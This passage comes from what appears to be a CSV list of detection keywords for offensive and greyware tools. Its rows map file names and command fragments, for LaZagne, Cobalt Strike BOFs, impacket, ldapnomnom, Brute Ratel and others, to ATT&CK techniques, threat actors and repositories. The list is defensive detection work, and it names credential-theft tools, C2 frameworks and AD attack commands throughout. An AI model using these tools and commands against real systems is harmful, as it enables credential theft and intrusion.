T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*LaunchExploitMode.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*LAUNCHING GPODDITY SMB SERVER AND WAITING FOR GPO REQUESTS*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*LaunchPreCompromise.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*layer8secure/SilentHound*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","1","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" +"*Lazagne*Passwords.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*laZagne.exe browsers*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*Lazagne.exe*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*laZagne.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*Lazagne.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*LaZagneForensic*","offensive_tool_keyword","LaZagneForensic","Windows passwords decryption from dump files","T1003 - T1081 - T1082","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagneForensic","1","1","N/A","N/A","5","450","114","2023-02-02T16:36:21Z","2018-02-01T15:44:31Z" +"*LaZagne-master.zip*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*lazynmap.sh*","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","1","N/A","N/A","4","350","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" +"*lazypariah *","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","0","N/A","N/A","2","136","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" +"*lazypariah.svg*","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","1","N/A","N/A","2","136","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" +"*lcmammnjlbmlbcaniggmlejfjpjagiia*","greyware_tool_keyword","Adblock Office VPN Proxy Server","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*ldap_enums.go*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" +"*ldap_shell.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*ldapasn1.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ldapattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*ldapattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ldapdomaindump*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" +"*LDAPDomainDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*ldapfilter:*admincount=1* /format:hashcat*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*LdapMiner*","offensive_tool_keyword","ldapminer","This is a tool I wrote to collect information from different LDAP Server implementation. This was written in C with the Netscape C","T1016 - T1018 - T1021 - T1046 - T1056 - T1069 - T1078 - T1087 - T1114 - T1482 - T1526 - T1597","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Information Gathering","https://sourceforge.net/projects/ldapminer/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ldapnomnom --input*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom-darwin-*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom-linux-*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom-main*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom-windows-386.exe*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom-windows-amd64.exe*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom-windows-arm64.exe*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*LDAP-Password-Hunter*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","10","2","189","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" +"*ldaprelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*ldaprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*LdapRelayScan.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*LdapRelayScan.py*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","N/A","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" +"*LdapRelayScan-main*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" +"*ldapsearch * ldap://*","greyware_tool_keyword","ldapsearch","ldapsearch to enumerate ldap","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://man7.org/linux/man-pages/man1/ldapsearch.1.html","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*ldapsearch -x -h * -s base*","greyware_tool_keyword","ldapsearch","ldapsearch to enumerate ldap","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://man7.org/linux/man-pages/man1/ldapsearch.1.html","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*ldapsearchad.py*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z" +"*ldapsearch-ad.py*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z" +"*ldap-searcher *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*ldapsentinel * raw *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*ldapsentinel forest user*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*LdapSignCheck.exe*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" +"*LdapSignCheck.Natives*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" +"*LdapSignCheck.sln*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" +"*ldapsigncheck.x64.*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" +"*ldapsigncheck.x86.*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 